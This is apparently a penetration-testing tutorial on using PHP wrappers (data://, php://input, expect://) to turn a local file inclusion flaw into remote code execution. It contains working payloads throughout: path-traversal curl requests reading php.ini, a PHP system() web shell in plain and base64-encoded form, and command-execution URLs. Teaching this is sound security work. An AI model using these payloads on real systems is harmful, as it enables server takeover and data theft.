# PHP Wrappers
We can use many methods to execute remote commands, each of which has a specific use case, as they depend on the back-end language/framework and the vulnerable function's capabilities. 

One easy and common method for gaining control over the back-end server is by enumerating user credentials and SSH keys, and then use those to login to the back-end server through SSH or any other remote session.

Other than such trivial methods, there are ways to achieve remote code execution directly through the vulnerable function without relying on data enumeration or local file privileges.
## Data
The [data](https://www.php.net/manual/en/wrappers.data.php) wrapper can be used to include external data, including PHP code. However, the data wrapper is only available to use if the (`allow_url_include`) setting is enabled in the PHP configurations.

So, let's first confirm whether this setting is enabled, by reading the PHP configuration file through the LFI vulnerability.
### Checking PHP Configurations
To do so, we can include the PHP configuration file found at (`/etc/php/X.Y/apache2/php.ini`) for Apache or at (`/etc/php/X.Y/fpm/php.ini`) for Nginx, where `X.Y` is your install PHP version. 
1. We can start with the latest PHP version, and try earlier versions if we couldn't locate the configuration file. 
2. We will also use the `base64` filter we used in the previous section, as `.ini` files are similar to `.php` files and should be encoded to avoid breaking. 
3. Finally, we'll use cURL or Burp instead of a browser, as the output string could be very long and we should be able to properly capture it:
```bash
curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
```

Once we have the base64 encoded string, we can decode it and `grep` for `allow_url_include` to see its value:
```bash
echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep allow_url_include
```

Now it will show if the option is enabled or not. If so, we can use the `data` wrapper.
### Remote Code Execution
The `data` wrapper can be used to include external data, including PHP code. We can also pass it `base64` encoded strings with `text/plain;base64`, and it has the ability to decode them and execute the PHP code.

So, our first step would be to base64 encode a basic PHP web shell, as follows:
```bash
echo '<?php system($_GET["cmd"]); ?>' | base64
```

Now, we can URL encode the base64 string, and then pass it to the data wrapper with `data://text/plain;base64,`. Finally, we can use pass commands to the web shell with `&cmd=<COMMAND>`:
```url
http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
```

We may also use cURL for the same attack, as follows:
```bash
curl -s 'http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid
```
## Input
Similar to the `data` wrapper, the [input](https://www.php.net/manual/en/wrappers.php.php) wrapper can be used to include external input and execute PHP code. 

The difference between it and the `data` wrapper is that we pass our input to the `input` wrapper as a POST request's data. So, the vulnerable parameter must accept POST requests for this attack to work. Finally, the `input` wrapper also depends on the `allow_url_include` setting, as mentioned earlier.

To repeat our earlier attack but with the `input` wrapper, we can send a POST request to the vulnerable URL and add our web shell as POST data. To execute a command, we would pass it as a GET parameter, as we did in our previous attack:
```bash
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
```
> **Note:** To pass our command as a GET request, we need the vulnerable function to also accept GET request (i.e. use `$_REQUEST`). If it only accepts POST requests, then we can put our command directly in our PHP code, instead of a dynamic web shell (e.g. `<\?php system('id')?>`)
## Expect
Finally, we may utilize the [expect](https://www.php.net/manual/en/wrappers.expect.php) wrapper, which allows us to directly run commands through URL streams.

Expect is an external wrapper, so it needs to be manually installed and enabled on the back-end server, though some web apps rely on it for their core functionality, so we may find it in specific cases. We can determine whether it is installed on the back-end server just like we did with `allow_url_include` earlier, but we'd `grep` for `expect` instead, and if it is installed and enabled we'd get the following:
```shell-session
extension=expect
```

To use the expect module, we can use the `expect://` wrapper and then pass the command we want to execute, as follows:
```bash
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
```